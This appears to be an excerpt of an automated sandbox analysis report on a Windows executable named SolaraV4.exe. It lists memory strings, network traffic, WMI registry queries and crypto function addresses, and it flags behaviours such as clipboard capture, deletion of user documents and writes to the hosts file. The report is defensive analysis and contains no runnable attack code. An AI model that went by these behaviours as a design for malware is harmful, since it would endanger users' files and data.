00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: SolaraV4.exe, 00000003.00000003.2966380888.0000024133ECB000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: SolaraV4.exe, 00000003.00000003.2820032119.0000024133501000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: SolaraV4.exe, 00000003.00000003.2820032119.0000024133501000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SolaraV4.exe, 00000003.00000002.2977638969.00000241338C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: SolaraV4.exe, 00000003.00000003.2640204583.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2661241266.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2659321131.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974839187.0000024133170000.00000004.00001000.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2657682251.0000024133549000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977638969.0000024133920000.00000004.00001000.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2652473109.0000024133495000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: SolaraV4.exe, 00000003.00000002.2977638969.00000241338F4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: SolaraV4.exe, 00000003.00000003.2609667863.000002413355D000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2595469515.000002413355D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: SolaraV4.exe, 00000003.00000003.2634564917.0000024133558000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2657682251.0000024133558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
Source: SolaraV4.exe, 00000003.00000003.2642570776.0000024132C16000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2609667863.000002413355D000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2595469515.000002413355D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: SolaraV4.exe, 00000003.00000003.2634564917.0000024133558000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2657682251.0000024133558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
Source: SolaraV4.exe, 00000003.00000003.2634564917.0000024133558000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2612878414.000002413354D000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2657682251.0000024133558000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2609667863.000002413355D000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2595469515.000002413354D000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2975029437.0000024133363000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2595469515.000002413355D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SolaraV4.exe, 00000003.00000003.2634564917.0000024133558000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2657682251.0000024133558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SolaraV4.exe, 00000003.00000002.2977638969.00000241338F4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: SolaraV4.exe, 00000003.00000003.2966380888.0000024133ECB000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2986752957.00007FFE761B3000.00000004.00000001.01000000.0000000F.sdmp, SolaraV4.exe, 00000003.00000002.2983884533.00007FFE75E51000.00000004.00000001.01000000.00000010.sdmp String found in binary or memory: https://www.openssl.org/H
Source: SolaraV4.exe, 00000001.00000003.2467594867.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: SolaraV4.exe, 00000003.00000002.2974034125.0000024132C70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: SolaraV4.exe, 00000003.00000003.2966380888.0000024133ECB000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: SolaraV4.exe, 00000003.00000003.2496514190.0000024132E88000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2668174875.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974439569.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2658597789.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967612000.0000024132E7E000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2679350163.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2677235249.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2660879553.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2637075073.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2821702107.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2614558332.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: SolaraV4.exe, 00000003.00000003.2966380888.0000024133ECB000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: SolaraV4.exe, 00000003.00000003.2668174875.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2679350163.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2658597789.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2975029437.0000024133330000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2614558332.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967612000.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2821702107.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2637075073.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2660879553.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2677235249.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974439569.0000024133041000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://yahoo.com/
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands
barindex
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\SolaraV4.exe File deleted: C:\Users\user\AppData\Local\Temp\?? ?? ?? \Common Files\Desktop\EFOYFBOLXA.docx Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File deleted: C:\Users\user\AppData\Local\Temp\?? ?? ?? \Common Files\Desktop\BJZFPPWAPT.pdf Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File deleted: C:\Users\user\AppData\Local\Temp\?? ?? ?? \Common Files\Desktop\EOWRVPQCCS.mp3 Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File deleted: C:\Users\user\AppData\Local\Temp\?? ?? ?? \Common Files\Desktop\EOWRVPQCCS.mp3 Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File deleted: C:\Users\user\AppData\Local\Temp\?? ?? ?? \Common Files\Desktop\PALRGUCVEH.xlsx Jump to behavior
Modifies the hosts file
Source: C:\Users\user\Desktop\SolaraV4.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Too many similar processes found
Source: conhost.exe Process created: 40
Source: cmd.exe Process created: 75

System Summary
barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FE21C: FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 108_2_00007FF7C71FE21C
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 108_2_00007FF7C722B57C
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\SIHClient.exe File created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMPF080.tmp
Source: C:\Windows\System32\SIHClient.exe File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMPF88B.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC708C8 1_2_00007FF6FFC708C8
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC51000 1_2_00007FF6FFC51000
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC589E0 1_2_00007FF6FFC589E0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC76964 1_2_00007FF6FFC76964
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC680E4 1_2_00007FF6FFC680E4
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC740AC 1_2_00007FF6FFC740AC
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC71874 1_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC59800 1_2_00007FF6FFC59800
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC68794 1_2_00007FF6FFC68794
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC61740 1_2_00007FF6FFC61740
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC61F60 1_2_00007FF6FFC61F60
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC79728 1_2_00007FF6FFC79728
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC6DEF0 1_2_00007FF6FFC6DEF0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC75E7C 1_2_00007FF6FFC75E7C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC69EA0 1_2_00007FF6FFC69EA0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC635A0 1_2_00007FF6FFC635A0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC61D54 1_2_00007FF6FFC61D54
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC6E570 1_2_00007FF6FFC6E570
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC65D30 1_2_00007FF6FFC65D30
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5A47B 1_2_00007FF6FFC5A47B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5ACAD 1_2_00007FF6FFC5ACAD
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC73C10 1_2_00007FF6FFC73C10
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC62C10 1_2_00007FF6FFC62C10
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC75C00 1_2_00007FF6FFC75C00
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC76418 1_2_00007FF6FFC76418
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC708C8 1_2_00007FF6FFC708C8
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC61B50 1_2_00007FF6FFC61B50
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5A2DB 1_2_00007FF6FFC5A2DB
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC6DA5C 1_2_00007FF6FFC6DA5C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC639A4 1_2_00007FF6FFC639A4
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC61944 1_2_00007FF6FFC61944
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC62164 1_2_00007FF6FFC62164
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC51000 3_2_00007FF6FFC51000
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5A2DB 3_2_00007FF6FFC5A2DB
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC76964 3_2_00007FF6FFC76964
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC708C8 3_2_00007FF6FFC708C8
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC680E4 3_2_00007FF6FFC680E4
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC740AC 3_2_00007FF6FFC740AC
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC71874 3_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC59800 3_2_00007FF6FFC59800
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC68794 3_2_00007FF6FFC68794
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC61740 3_2_00007FF6FFC61740
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC61F60 3_2_00007FF6FFC61F60
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC79728 3_2_00007FF6FFC79728
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC6DEF0 3_2_00007FF6FFC6DEF0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC75E7C 3_2_00007FF6FFC75E7C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC69EA0 3_2_00007FF6FFC69EA0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC635A0 3_2_00007FF6FFC635A0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC61D54 3_2_00007FF6FFC61D54
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC6E570 3_2_00007FF6FFC6E570
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC65D30 3_2_00007FF6FFC65D30
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5A47B 3_2_00007FF6FFC5A47B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5ACAD 3_2_00007FF6FFC5ACAD
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC73C10 3_2_00007FF6FFC73C10
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC62C10 3_2_00007FF6FFC62C10
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC75C00 3_2_00007FF6FFC75C00
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC76418 3_2_00007FF6FFC76418
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC708C8 3_2_00007FF6FFC708C8
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC61B50 3_2_00007FF6FFC61B50
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC6DA5C 3_2_00007FF6FFC6DA5C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC589E0 3_2_00007FF6FFC589E0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC639A4 3_2_00007FF6FFC639A4
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC61944 3_2_00007FF6FFC61944
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC62164 3_2_00007FF6FFC62164
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C818D0 3_2_00007FFE75C818D0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C812F0 3_2_00007FFE75C812F0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DAB360 3_2_00007FFE75DAB360
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1C94 3_2_00007FFE75DA1C94
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA17BD 3_2_00007FFE75DA17BD
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA13F2 3_2_00007FFE75DA13F2
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DB1200 3_2_00007FFE75DB1200
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1398 3_2_00007FFE75DA1398
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA115E 3_2_00007FFE75DA115E
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1A87 3_2_00007FFE75DA1A87
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1997 3_2_00007FFE75DA1997
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1956 3_2_00007FFE75DA1956
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DAF8E5 3_2_00007FFE75DAF8E5
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1451 3_2_00007FFE75DA1451
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA114F 3_2_00007FFE75DA114F
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E07860 3_2_00007FFE75E07860
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1BDB 3_2_00007FFE75DA1BDB
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E00050 3_2_00007FFE75E00050
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA20AE 3_2_00007FFE75DA20AE
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA256D 3_2_00007FFE75DA256D
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E502A0 3_2_00007FFE75E502A0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA168B 3_2_00007FFE75DA168B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA15B4 3_2_00007FFE75DA15B4
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA6B90 3_2_00007FFE75DA6B90
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA1537 3_2_00007FFE75DA1537
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE761B1850 3_2_00007FFE761B1850
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E654C5 3_2_00007FFE75E654C5
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6542A 3_2_00007FFE75E6542A
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E8B4C0 3_2_00007FFE75E8B4C0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E615C8 3_2_00007FFE75E615C8
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6655F 3_2_00007FFE75E6655F
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75F97800 3_2_00007FFE75F97800
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E65F0B 3_2_00007FFE75E65F0B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E65D85 3_2_00007FFE75E65D85
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E7F200 3_2_00007FFE75E7F200
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E668C5 3_2_00007FFE75E668C5
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6114F 3_2_00007FFE75E6114F
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E66EEC 3_2_00007FFE75E66EEC
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E61EA1 3_2_00007FFE75E61EA1
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E7F060 3_2_00007FFE75E7F060
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E65164 3_2_00007FFE75E65164
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E653A3 3_2_00007FFE75E653A3
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6144C 3_2_00007FFE75E6144C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6659B 3_2_00007FFE75E6659B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E629CD 3_2_00007FFE75E629CD
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE760171D0 3_2_00007FFE760171D0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75F8FE60 3_2_00007FFE75F8FE60
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E62289 3_2_00007FFE75E62289
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E62D0B 3_2_00007FFE75E62D0B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E7BD60 3_2_00007FFE75E7BD60
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6266C 3_2_00007FFE75E6266C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6724D 3_2_00007FFE75E6724D
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E7BF20 3_2_00007FFE75E7BF20
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E64160 3_2_00007FFE75E64160
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75ECFA00 3_2_00007FFE75ECFA00
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75F9FB40 3_2_00007FFE75F9FB40
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E650A6 3_2_00007FFE75E650A6
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E8B850 3_2_00007FFE75E8B850
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E621B7 3_2_00007FFE75E621B7
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6609B 3_2_00007FFE75E6609B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6216C 3_2_00007FFE75E6216C
